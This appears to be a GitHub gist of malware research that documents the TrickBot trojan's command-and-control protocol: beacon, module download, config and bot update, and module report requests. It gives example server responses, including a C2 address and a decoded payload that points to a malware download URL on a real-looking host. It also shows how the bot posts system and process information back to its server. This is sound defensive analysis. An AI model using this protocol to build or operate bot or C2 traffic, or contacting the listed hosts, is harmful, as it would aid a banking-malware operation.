Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
TrickBot protocol (work in progress)
Full list of implemented commands:
0
1
5
10
14
23
25
63
===========
Command: 0
===========
Meaning: Beacon
Req:
/[group_id]/[client_id]/0/[windows version]/[system language id]/[ip]/[sha256 uppercase string]/[session key]/
Possible responses after beacon:
Resp 1:
eventually: with additional configuration
----
/1/[group_id]/[client_id]/[session key]/288/
[encrypted]
123456789
encrypted - example:
<servconf>
<expir>1480550400</expir>
<plugins>
<psrv>80.79.114.179:443</psrv>
</plugins>
</servconf>
----
Resp: 42
Meaning - download a new, independent malware
/42/[group_id]/[client_id]/[session key]/35265/
[base64data]
123456789
example:
base64data:
AAAAABITWmON7YmzLzAoFn2jj0looA8XxcYfqQte5O1dab8lJgAAAGgAdAB0AHAA OgAvAC8AMQA1ADYAMQA2AC4AbQBlAHIAYQBoAG8AcwB0AC4AcgB1AC8AOAA1ADEA MwAyADEAMwA2ADUALgBiAGkAbgCT/OBixlv7jD/hi/8w9D3I9LCYf93qh72eEiPo vmcQCB8uL8nz4b9Oqja3omAflv5xR8TDnus4djX37duvEaMHhmxqIlrDcG5DtlIp FG9IsZSitDDFhRsGsQuoI9Vtwls=
decoded:
00000000 00 00 00 00 - (padding?) |....
12 13 5a 63 8d ed 89 b3 2f 30 28 16 | ..Zc..../0(.|
00000010 7d a3 8f 49 68 a0 0f 17 c5 c6 1f a9 0b 5e e4 ed |}..Ih........^..|
00000020 5d 69 bf 25 - sha256 |]i.%
26 00 00 00 - URL length | &...
68 00 74 00 74 00 70 00 | h.t.t.p.|
00000030 3a 00 2f 00 2f 00 31 00 35 00 36 00 31 00 36 00 |:././.1.5.6.1.6.|
00000040 2e 00 6d 00 65 00 72 00 61 00 68 00 6f 00 73 00 |..m.e.r.a.h.o.s.|
00000050 74 00 2e 00 72 00 75 00 2f 00 38 00 35 00 31 00 |t...r.u./.8.5.1.|
00000060 33 00 32 00 31 00 33 00 36 00 35 00 2e 00 62 00 |3.2.1.3.6.5...b.|
00000070 69 00 6e 00 - URL |i.n.
93 fc e0 62 c6 5b fb 8c 3f e1 8b ff | ...b.[..?...|
00000080 30 f4 3d c8 f4 b0 98 7f dd ea 87 bd 9e 12 23 e8 |0.=...........#.|
00000090 be 67 10 08 1f 2e 2f c9 f3 e1 bf 4e aa 36 b7 a2 |.g..../....N.6..|
000000a0 60 1f 96 fe 71 47 c4 c3 9e eb 38 76 35 f7 ed db |`...qG....8v5...|
000000b0 af 11 a3 07 86 6c 6a 22 5a c3 70 6e 43 b6 52 29 |.....lj"Z.pnC.R)|
000000c0 14 6f 48 b1 94 a2 b4 30 c5 85 1b 06 b1 0b a8 23 |.oH....0.......#|
000000d0 d5 6d c2 5b - signature |.m.[|
===========
Command: 1
===========
Meaning: Keep alive
Req:
/[group_id]/[client_id]/1/[session key]/
Resp:
/1/
===========
Command: 5
===========
Meaning: Download module/module config
Req:
/[group_id]/[client_id]/5/[module/config name]/
Examples:
/[group_id]/[client_id]/5/spk/
/[group_id]/[client_id]/5/dinj/
/[group_id]/[client_id]/5/sinj/
/[group_id]/[client_id]/5/dpost/
/[group_id]/[client_id]/5/systeminfo32/
/[group_id]/[client_id]/5/injectDll32/
Resp:
[AES encrypted data - requested module]
===========
Command: 10
===========
Meaning: start module info?
Req:
/[group_id]/[client_id]/10/62/[session key]/1/
* Example:
/[group_id]/[client_id]/10/62/HIZQJUXGMUJXATGQT/1/
Resp: [None]
===========
Command: 14
===========
Meaning: Additional info/checks
Req:
/[group_id]/[client_id]/14/[key]/[value]/0/
*Examples:
user info:
/[group_id]/[client_id]/14/user/[username]/0/
is DNS blacklisted?
/[group_id]/[client_id]/14/DNSBL/listed/0/
/[group_id]/[client_id]/14/DNSBL/not%20listed/0/
Resp:
[None]
===========
Command: 23
===========
Meaning: Compare my config version with the current version:
Req:
/[group_id]/[client_id]/23/[config ver]/
* Example:
/[group_id]/[client_id]/23/1000002/
Resp:
-if update available:
/23/[group_id]/[client_id]/1000003/704/
[encrypted]
1234567890
encrypted:
updated config content
-if no update:
[None]
===========
Command: 25
===========
Meaning: Check bot update
/[group_id]/[client_id]/25/[session key]/
Resp:
-if update available:
/25/[group_id]/[client_id]/[session key]/
[link to the updated bot]
123456789
[Bot updates itself, downloading a new version from the given url...]
-if no update:
[None]
===========
Command 63
===========
Meaning: Module report
Req:
/[group_id]/[client_id]/63/[module name]/[module command]/[result - base64]/[root tag of output XML]/
* Example:
/[group_id]/[client_id]/63/systeminfo/start/(null)//
* Example:
/[group_id]/[client_id]/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/
c3VjY2Vzcw== -> Base64("success")
Content-Type: multipart/form-data; boundary=------Boundary[random id]
[posting list of running processes and installed programs:]
--------Boundary[random id]
Content-Disposition: form-data; name="noname"
<systeminfo>[...]</systeminfo>
--------Boundary[random id]--
* Example:
/[group_id]/[client_id]/63/injectDll/start/U3VjY2Vzcw==//
U3VjY2Vzcw== -> Base64("Success")
Resp:
[None]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment